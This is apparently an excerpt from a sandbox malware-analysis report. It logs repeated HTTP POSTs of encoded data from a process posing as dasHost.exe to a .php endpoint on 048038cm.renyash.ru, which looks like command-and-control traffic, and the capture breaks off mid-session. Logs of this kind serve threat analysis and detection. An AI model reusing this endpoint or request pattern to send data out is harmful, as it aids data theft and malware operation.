                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KS4SJhABdmF4Ccm85MyqJvtFvRRAOq27kF4dBBk1DkDvE0g9g6N%2FdnYEPeAzUXuUv8KAjr4m0zUfiKvUFiP7E86F9w7DrqqHeojVJthiYX%2F1C8FtwMDWL%2FrenVe9aGG5kdGzReYE"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a3b684a8ce9-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4136&min_rtt=1988&rtt_var=5042&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=76136&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        31192.168.2.449834104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:34.307214022 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:34.657371998 CET2584OUTData Raw: 56 5a 59 53 53 44 55 5e 5d 5f 52 56 5a 5d 58 5c 57 5d 5f 59 54 55 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VZYSSDU^]_RVZ]X\W]_YTUU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'),!(Y75,+(4=!=#Q )<)<;.53$(,%\ ![(3
                                                                        Dec 28, 2024 20:43:35.485979080 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:35.737128019 CET802INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:35 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M1XXpj4ASl5xRxZ7pTtoTUtQaiYeEY33z5GXnJ2gBh4FW1gPFGmPZM7rjAFceGhP2LepDx2pOJk7s6GGnv%2Fd9EkASbN0u3HsJ7bDcUON%2BBM1OPyY6Spo6MhYVOKEbSohS5umHXFg"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a45cf880cb4-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3564&min_rtt=1598&rtt_var=4532&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=84246&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        32192.168.2.449839104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:35.978044987 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2580
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:36.329363108 CET2580OUTData Raw: 56 54 59 55 53 46 55 58 5d 5f 52 56 5a 58 58 58 57 5e 5f 51 54 5c 55 43 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VTYUSFUX]_RVZXXXW^_QT\UCR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$?Z1!<Z45 _,;,!.X+=44>Y?,:?[6)%\ ![(7
                                                                        Dec 28, 2024 20:43:37.801753044 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:38.107362986 CET808INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:37 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G9oYFV42a06S45GoHNd9YECk2gHpHIZGFVR%2FSVRjEk8Qtx2KtiOiEeZhifZbkLGF3H4q0cjTlq4ONbRcaIXk2JazLmuajDMD9fnfY%2BYAMOTI1wM9RmvoCiYMD6%2F27dAWXmOTxpAp"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a5378f243ad-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=109913&min_rtt=100580&rtt_var=56384&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2886&delivery_rate=8331&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        33192.168.2.449841104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:38.354841948 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:38.704314947 CET2584OUTData Raw: 56 57 59 54 53 42 50 59 5d 5f 52 56 5a 5d 58 5b 57 5e 5f 5c 54 53 55 46 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VWYTSBPY]_RVZ]X[W^_\TSUFR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Y+?15+7%,-+X >>-( ?P=/,:_4!0=,%\ ![(3
                                                                        Dec 28, 2024 20:43:39.848402023 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:40.133791924 CET804INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:39 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrZQGy9wG1xxHsBDIDQRfmKsyv5sOy1VUKJgUNsqSchVpr3hLUxUoGNSQ6izsPxhqg7J7x0GgTUvfttxT8edKzMgRU1h%2FkFd4VWnqRC4OQDZTohqgrexMo4il5CByr%2FrCQ43X9uX"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a605fc818b8-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=81278&min_rtt=68551&rtt_var=51161&sent=5&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=8569&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        34192.168.2.449847104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:40.370738983 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:40.719938040 CET2584OUTData Raw: 56 55 59 55 53 45 55 5f 5d 5f 52 56 5a 5c 58 5a 57 5b 5f 5e 54 52 55 48 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VUYUSEU_]_RVZ\XZW[_^TRUHR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$_("6? (/4.*)379#P=-!8)%\ ![(7
                                                                        Dec 28, 2024 20:43:41.547317028 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:41.805100918 CET808INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:41 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uegMpLE5Q5kxSmA%2FdEAz%2BHAaDDZRtrAGJtEOHlTwvZupf7mCgRkKHJI034J3BkhqHWOiuqouqHBw4SowtXQHNxHrgWa%2FaK0lZaKW3b%2BMQ2i0EOMwa%2BMl7akPkmDSk3WCXWZSaGFE"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a6baa5e0f85-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3634&min_rtt=1468&rtt_var=4883&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=77663&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        35192.168.2.449853104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:42.042717934 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2580
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:42.391854048 CET2580OUTData Raw: 56 50 59 5e 56 42 55 5c 5d 5f 52 56 5a 58 58 5e 57 59 5f 58 54 5d 55 49 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VPY^VBU\]_RVZXX^WY_XT]UIR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$^?Z9[588^"5;; ="*##)/+_-)'Y!V8>%\ ![(/
                                                                        Dec 28, 2024 20:43:43.127501011 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:43.369401932 CET817INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:43 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BAH%2FF%2F75vRt9GZbSGmLDKYoo%2BYxsQ%2FwMe0Btu5oz4ip%2BrGg3BLgF21%2FON0npzSiPDRHFwUocXiILsGzeq28eemjdhgp74Uh%2FlE7mWDCTnHgWPcrOt0H07z%2BYrUvyVQQQc0y5tP3%2B"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a75992c41e0-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3064&min_rtt=1652&rtt_var=3444&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2886&delivery_rate=112715&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        36192.168.2.449858104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:43.608306885 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:43.954256058 CET2584OUTData Raw: 56 53 59 5f 53 41 55 58 5d 5f 52 56 5a 51 58 5a 57 50 5f 5c 54 52 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VSY_SAUX]_RVZQXZWP_\TRU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Z? ;<Y754/;34=, )/T(??9$# /_*<%\ ![(
                                                                        Dec 28, 2024 20:43:44.739018917 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:44.987900019 CET801INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:44 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DkaOdn7C7iveo2p19KAYN8iPG3%2Fc1nEqpIpzrIEzZ3iKEp48CdPPjY9TR4t7qP3l5gLxWsTwm24ZvgKPN0cybtPLv5deXEbUiBlzaZ4vRBoTD27dfpt2VId0RIuG5kBEaAXujvi0"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a7fab440fab-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2797&min_rtt=1634&rtt_var=2939&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=133455&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        37192.168.2.449860104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:45.230799913 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:45.579380989 CET2584OUTData Raw: 56 50 59 55 53 41 50 52 5d 5f 52 56 5a 5b 58 54 57 50 5f 51 54 52 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VPYUSAPR]_RVZ[XTWP_QTRU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'?<&6]?48-;+#.>^*P7<=<?9:#!<*%\ ![(+
                                                                        Dec 28, 2024 20:43:46.315700054 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:46.586679935 CET815INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:46 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gM6Wr1SJkek342q1UPhFSF%2FPbYZ5rBfBDGJIOCQrsp%2FOVfthUwP%2FLF%2F1aQOF3q5ONI6IxaLCQc%2Buva875N2xAjo15DQgqkmYJKtUZ6YsMrwyX7ifnV%2FJsV%2BBU%2BhvAnlYDO6aG5SN"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a898c536a5f-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=7005&min_rtt=1770&rtt_var=11134&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=33447&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        38192.168.2.449866104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:46.840744972 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:47.188683987 CET2584OUTData Raw: 53 55 59 55 56 48 50 5c 5d 5f 52 56 5a 5b 58 54 57 5c 5f 5f 54 5c 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SUYUVHP\]_RVZ[XTW\__T\U@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$)?1]!77;8+Z7>>>'7,=//.3]"#>%\ ![(+
                                                                        Dec 28, 2024 20:43:47.972851992 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:48.222664118 CET805INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:48 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ofLbHxJk1OnAQqCEFHG5DgLwHLa6gVv7jf7fXio0WPCkd7UOn39%2BtwGf06P4p5WxGjqAYhJzs7r4Zobza03%2ByR7dS8l7pW8Tfr16oBmnNhc4AxLO%2FAIL1o41jU27I4S0FcdAVtD7"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a93eebe8c39-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3318&min_rtt=2080&rtt_var=3256&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=121818&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        39192.168.2.449871104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:48.464011908 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:48.813771009 CET2584OUTData Raw: 53 56 5c 54 53 42 50 5e 5d 5f 52 56 5a 5f 58 5c 57 5c 5f 5e 54 56 55 41 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SV\TSBP^]_RVZ_X\W\_^TVUAR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$(?96 #%/;'\ ="Y>>04P(/;_::'["08><%\ ![(
                                                                        Dec 28, 2024 20:43:49.602549076 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:49.843803883 CET813INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:49 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2B3Z6xTc%2FeRAqgY%2Bd0w5Xi76tLCAV5UxAOtMIlbC2%2BCSxbMAFqyIhfb9Y2pqfcdhROrqUHSdrDlRrWUB3%2B8HzsEojHyTAeuK%2FGVgsnO6Fa5xDzDoBU8LaHiztG%2FK7DWJyT3E2y1R"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a9e187843cd-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8218&min_rtt=1755&rtt_var=13585&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=27308&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        40192.168.2.449874104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:50.092655897 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:50.438827991 CET2584OUTData Raw: 56 57 59 54 56 45 50 52 5d 5f 52 56 5a 5f 58 5d 57 5f 5f 5b 54 54 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
